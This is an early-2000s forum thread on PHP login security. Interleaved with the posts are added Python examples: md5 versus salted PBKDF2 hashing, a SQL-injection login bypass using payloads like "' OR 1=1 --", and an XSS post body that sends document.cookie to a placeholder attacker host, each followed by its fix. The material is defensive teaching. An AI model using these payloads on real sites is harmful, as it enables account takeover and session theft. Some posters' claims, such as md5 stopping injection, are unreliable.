
Thread: User Authentication Security

  1. #1 - Thread Starter (Hyperactive Member, joined Sep 2002, 258 posts)

    User Authentication Security

    How secure is a PHP script that retrieves a user's login via PHP and stores it in a MySQL DB? I'd have thought that, bar anyone gaining access to the DB, it's very secure... is this somewhat naive?

    Why would I want to use encryption on the users' passwords, such as MD5? Would this be solely to provide my users with a sense of personal security from the script's host?

    Just wanting some informed opinions.

  2. #2 - The Hobo (Stuck in the 80s, joined Jul 2001, Michigan, 7,256 posts)
    The only reason I provide md5() in my applications where there are multiple users is so that admins cannot look in the database, find out the password, and then mess with their account.

    Of course, if they knew a little PHP, then they could just replace the password with another hashed one...but if they know PHP, there's probably very little that can be done to prevent it.
    My evil laugh has a squeak in it.

    kristopherwilson.com

  3. #3 - Thread Starter (Hyperactive Member, joined Sep 2002, 258 posts)
    That's what I figured. :S

    So, the advantage of it is only to give the users of the forum some assurance that whatever passwords they use, can't be seen by others who may have access to the account details... or anyone that hacks into the account's data area.

    Thanks

  4. #4 - Frenzied Member (joined Nov 1999, 1,337 posts)
    No, it isn't for the assurance of the users. They don't even know how it is stored unless it says in text somewhere.

    It is very possible to hack a MySQL database if the coding is not good, hence the reason to keep the passwords encrypted, not just for the admins.

  5. #5 - Thread Starter (Hyperactive Member, joined Sep 2002, 258 posts)
    No, it isn't for the assurance of the users. They don't even know how it is stored unless it says in text somewhere.
    Precisely. Which should be accepted as is from a trusted source... hopefully.

    It is very possible to hack a MySQL database if the coding is not good, hence the reason to keep the passwords encrypted, not just for the admins.
    Which goes back to what I was saying before... I think.

    -----------
    So, the advantage of it is only to give the users of the forum some assurance that whatever passwords they use, can't be seen by others who may have access to the account details... or anyone that hacks into the account's data area.
    -----------

    As always, thanks guys.

  6. #6 - Frenzied Member (joined Nov 1999, 1,337 posts)
    I think you missed something. The users of the forum have no idea the passwords are encrypted. The reason is they can't see in the database themselves.

    The main reason we encrypt passwords is because we don't want our software hacked, and then people wouldn't trust it and would never buy it.

    It is the makers of the forum, not the users.

    Not just forums, but think about if we had credit card numbers (pretty stupid, but it has been done) in the database and no encryption, and somebody hacked the database. They would get all those CC #'s and the users' names and passwords. The users would be furious because the makers didn't encrypt the passwords. So it is up to the script makers to protect their investment. It isn't to reassure the users.
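Posts #2, #4 and #6 argue over who md5() protects the passwords from (admins, or whoever breaks into the database). The following is an added example, not code from this thread or any of its posters, written in Python rather than PHP so it runs stand-alone. It puts the bare md5() scheme the posters describe beside a per-user salted, iterated hash (PBKDF2-HMAC-SHA256), and shows the practical difference: with unsalted md5, two users with the same password get the same stored value and a single word list cracks every copy of it; with a random salt and iterations, stored values differ per user and each guess costs real work. The word list and passwords are constructed for the demonstration.

```python
import hashlib
import hmac
import os
from typing import Optional

# Scheme the thread discusses: a bare md5() of the password, no salt.
def md5_store(password: str) -> str:
    return hashlib.md5(password.encode("utf-8")).hexdigest()

# Constructed word list standing in for a cracker's dictionary.
WORDLIST = ["123456", "password", "letmein", "qwerty", "secret123"]

def crack_md5(stored_hash: str, wordlist) -> Optional[str]:
    """Offline guess against an unsalted md5: one hash per word, and a
    table built once works against every user of every site that uses md5()."""
    for guess in wordlist:
        if md5_store(guess) == stored_hash:
            return guess
    return None

ITERATIONS = 100_000  # slows each guess; tune so one login costs a few ms

def pbkdf2_store(password: str, salt: Optional[bytes] = None) -> str:
    """Per-user random salt + iterated PBKDF2-HMAC-SHA256. The stored string
    carries algorithm, iteration count and salt so it can be verified later."""
    if salt is None:
        salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    return "pbkdf2_sha256$%d$%s$%s" % (ITERATIONS, salt.hex(), dk.hex())

def pbkdf2_verify(password: str, stored: str) -> bool:
    try:
        algo, iters, salt_hex, dk_hex = stored.split("$")
    except ValueError:
        return False
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                             bytes.fromhex(salt_hex), int(iters))
    # Constant-time comparison: does not leak how many leading bytes matched.
    return hmac.compare_digest(dk.hex(), dk_hex)

def same_password_collides(scheme, password: str) -> bool:
    """True if two users who pick the same password end up with identical
    stored values, which is what lets an admin or a cracker reuse one result."""
    return scheme(password) == scheme(password)

if __name__ == "__main__":
    h = md5_store("letmein")
    print("md5:", h, "cracked as:", crack_md5(h, WORDLIST))
    s = pbkdf2_store("letmein")
    print("pbkdf2:", s)
    print("verify correct:", pbkdf2_verify("letmein", s),
          "verify wrong:", pbkdf2_verify("LetMeIn", s))
    print("md5 collides:", same_password_collides(md5_store, "letmein"),
          "pbkdf2 collides:", same_password_collides(pbkdf2_store, "letmein"))
```

The salt does not stop someone with the database from guessing a weak password; it stops them from using precomputed tables and from cracking all users for the price of one, and the iteration count is what makes each guess expensive.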

  7. #7 - Brandito (Lively Member, joined Nov 2000, Here, There, Every Where!, 106 posts)

    idea

    Sorry, but I skimmed what everyone else wrote.... so they might have already stated what I am about to say.

    You should keep user name, password, database stuff all stored in a separate file so if you give out your code you don't have to worry about people seeing that information. (Stored in variables)

    Encryption is also a MUST!!! Why encrypt the login and password, you ask? Because of injection attacks. I can hack your site without knowing the password in most cases. By using encryption functions... you are safer. For more information you can read some papers I wrote on the subject at
    www.jotdot.net/brandito/authentic

    There are also some other ways to secure your logins... but you don't need to worry about them if you design your pages correctly. (by the way... cookie authentication is easy to hack)

    hope that helps,
    Brandito
    Master of Cyber Fu - A Temple of Digital Chi
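Post #7 says a login can be bypassed by an injection attack without knowing the password. The following is an added example, not code from this thread or from Brandito's papers, in Python with an in-memory SQLite table rather than PHP and MySQL so it runs offline. It shows the string-assembled login query that many early PHP scripts used, two payloads typed into the username field that log in without a valid password, and the same query with bound parameters, against which those payloads are just strings. The user table and passwords are constructed for the demonstration, and passwords are kept in the clear here only to keep the focus on the query.

```python
import sqlite3
from typing import Optional

def make_db() -> sqlite3.Connection:
    """Constructed in-memory users table (a real table would store hashes)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, "
                 "username TEXT UNIQUE, password TEXT)")
    conn.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                     [("alice", "wonderland"), ("admin", "hunter2")])
    conn.commit()
    return conn

def login_vulnerable(conn, username: str, password: str) -> Optional[str]:
    """Query built by string interpolation, the pattern of
    "SELECT ... WHERE username='$user' AND password='$pass'" in early PHP.
    Anything the user types becomes SQL syntax."""
    sql = ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
           % (username, password))
    row = conn.execute(sql).fetchone()
    return row[0] if row else None

def login_safe(conn, username: str, password: str) -> Optional[str]:
    """Same query with bound parameters: the values travel separately from the
    SQL text, so quotes and comment markers in them are never parsed as syntax."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None

# Payloads typed into the username box; the password box can hold anything.
PAYLOAD_TARGET_USER = "admin' --"   # closes the quote, comments out the password check
PAYLOAD_ANY_USER = "' OR 1=1 --"    # makes the WHERE clause true for every row

def resulting_sql(username: str, password: str) -> str:
    """What the vulnerable function actually sends to the database."""
    return ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
            % (username, password))

if __name__ == "__main__":
    conn = make_db()
    print(resulting_sql(PAYLOAD_TARGET_USER, "x"))
    print("normal login:   ", login_vulnerable(conn, "alice", "wonderland"))
    print("target admin:   ", login_vulnerable(conn, PAYLOAD_TARGET_USER, "x"))
    print("any account:    ", login_vulnerable(conn, PAYLOAD_ANY_USER, "x"))
    print("safe, same input:", login_safe(conn, PAYLOAD_TARGET_USER, "x"))
```

Hashing the stored password does not close this hole on its own: the injected `--` removes the password comparison entirely, so the hash is never consulted. The fix is the parameterised query; hashing protects the passwords if the table is read, which is a separate problem.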

  8. #8 - Frenzied Member (joined Nov 1999, 1,337 posts)

    Re: idea

    Originally posted by Brandito
    (by the way... cookie authentication is easy to hack)

    hope that helps,
    Brandito
    and how do you figure that? can you give an example or something to back that statement up?

  9. #9 - Brandito (Lively Member, joined Nov 2000, Here, There, Every Where!, 106 posts)

    yes

    There are many reasons and examples why. But of course it is all on how you implement it and how secure your site is. If your site is poorly programmed... having cookie authentication will rape you every time.

    Example: phpBB was flawed by an HTML injection attack allowing everyone who went to a maliciously coded post to send their cookie authentication data to the "hacker". There are many other examples.

    l8r,
    Brandito

    again... it is all based on your implementation
    Master of Cyber Fu - A Temple of Digital Chi
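Post #9 describes the attack on cookie logins: a post body containing script is shown to every reader unescaped, and the script sends each reader's cookie to the attacker. The following is an added example, not code from this thread, from Brandito or from phpBB, in Python so it runs stand-alone. It constructs a post body of that kind (the attacker hostname is a placeholder), renders it the way a forum that inserts posts verbatim would, then renders it HTML-escaped on output, and builds the session Set-Cookie header with the HttpOnly and Secure attributes so that script in the page cannot read the cookie even if an escaping bug remains.

```python
import html
from http.cookies import SimpleCookie

# Constructed post body of the kind described: script that sends the
# reader's cookie to an attacker-controlled host (placeholder hostname).
MALICIOUS_POST = ("Nice forum!<script>new Image().src="
                  "'http://attacker.example/c?'+document.cookie;</script>")

def render_post_raw(body: str) -> str:
    """Inserts the post body into the page verbatim: every reader's browser
    runs whatever script the poster put there, with the reader's cookies."""
    return '<div class="post">%s</div>' % body

def render_post_escaped(body: str) -> str:
    """HTML-escapes the body on output: '<script>' arrives as visible text,
    not markup. Escaping belongs at output time, for every user-supplied field."""
    return '<div class="post">%s</div>' % html.escape(body, quote=True)

def session_cookie_header(session_id: str) -> str:
    """Set-Cookie header for the login session. HttpOnly keeps document.cookie
    from reading it, Secure keeps it off plain HTTP. Neither replaces escaping;
    they limit what a surviving injection can steal."""
    c = SimpleCookie()
    c["sid"] = session_id
    c["sid"]["httponly"] = True
    c["sid"]["secure"] = True
    c["sid"]["path"] = "/"
    return c.output()

def contains_script_tag(markup: str) -> bool:
    """Crude check used only to show the difference between the two renderers."""
    return "<script" in markup.lower()

if __name__ == "__main__":
    raw = render_post_raw(MALICIOUS_POST)
    safe = render_post_escaped(MALICIOUS_POST)
    print("raw renderer executes script:    ", contains_script_tag(raw))
    print("escaped renderer executes script:", contains_script_tag(safe))
    print(safe)
    print(session_cookie_header("c0ffee"))
```

The "it is all based on your implementation" point in the post is exactly this: the cookie itself is not the weakness, the unescaped post body is, and the cookie attributes only reduce the damage when that mistake is made.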

  10. #10 - Thread Starter (Hyperactive Member, joined Sep 2002, 258 posts)
    Thanks Brandito, that was an interesting read and has given me something else to think about. I'm going to try these SQL injection attacks out on my site.

    Hopefully it'll be ok as I've already considered malicious data entry as it seems to be covered in published PHP works too (to a small degree).
